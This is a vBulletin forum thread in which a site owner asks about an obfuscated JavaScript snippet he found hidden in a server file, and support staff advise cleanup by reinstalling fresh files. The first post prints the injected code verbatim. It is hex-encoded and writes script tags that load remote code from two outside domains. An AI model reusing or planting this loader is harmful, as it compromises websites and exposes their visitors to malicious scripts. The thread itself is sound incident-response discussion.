Okay to remove file var _0xe62f from java.cs?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • David Copeland
    Senior Member
    • May 2000
    • 1354
    • 4.2.5

    [Forum] Okay to remove file var _0xe62f from java.cs?

    On another thread the file var _0xe62f was quoted as a potential culprit in web attacks. In my .cs file for java, I found this same file at the very bottom on Line 558 as if it were placed there to be hidden. I copied and removed it, and the site seems to be working okay. Here is the code:
    PHP Code:
    var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2]) 

    DAVID COPELAND
    Licensed VB Holder Since 2000
    Celebrating 22 Years with VB
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73981

    #2
    vBulletin doesn't use Java. It does use Javascript. These are two completely different languages without relationship to each other despite the poor choice of names.

    vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    • David Copeland
      Senior Member
      • May 2000
      • 1354
      • 4.2.5

      #3
      Originally posted by Wayne Luke
      vBulletin doesn't use Java. It does use Javascript. These are two completely different languages without relationship to each other despite the poor choice of names.

      vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
      To better determine what the code related to, I did a Google search and the first hit was:

      Hello! Since yesterday, whenever I try to login on my forums (when I click on the username field) I get a popup ad, which I did not insert myself. It happens not


      Another site that offers various VB support also had the same code listed on one of their threads. The actual code may not be a VB file, but it appears there may be backdoor shells in place.

      After spending 4 hours going through server and CPanel files, I was able to stop the intrusiveness. Our server access is turned off to anyone who is not using our dedicated IP address. But I will be looking for some more tips (backdoor preventives) to help make this nightmare see a glimmer of hope.


      DAVID COPELAND
      Licensed VB Holder Since 2000
      Celebrating 22 Years with VB

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #4
        If you're not currently using vBulletin 4.2.5 with a fresh set of files then you'll have problems. Patches do not remove exploits from your site. If you patched to 4.2.2 PL4 back in 2013, or so, and didn't remove any backdoor exploit, it would have remained until today. You have to remove these manually. We have an entire topic on this stickied in this forum.

        https://www.vbulletin.com/forum/foru...ring-your-site

        Here is what I would do...

        1) Log into the AdminCP and disable all third-party products.
        2) Rename my vBulletin directory to something else.
        3) Create a new directory to hold vBulletin.
        4) Upload new files from a fresh download of vBulletin 4.2.5.
        5. Use these files to run your forum.

        Other options would be upgrading to vBulletin 5.5.0 or vBulletin Cloud.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment

        Related Topics

        Collapse

        Working...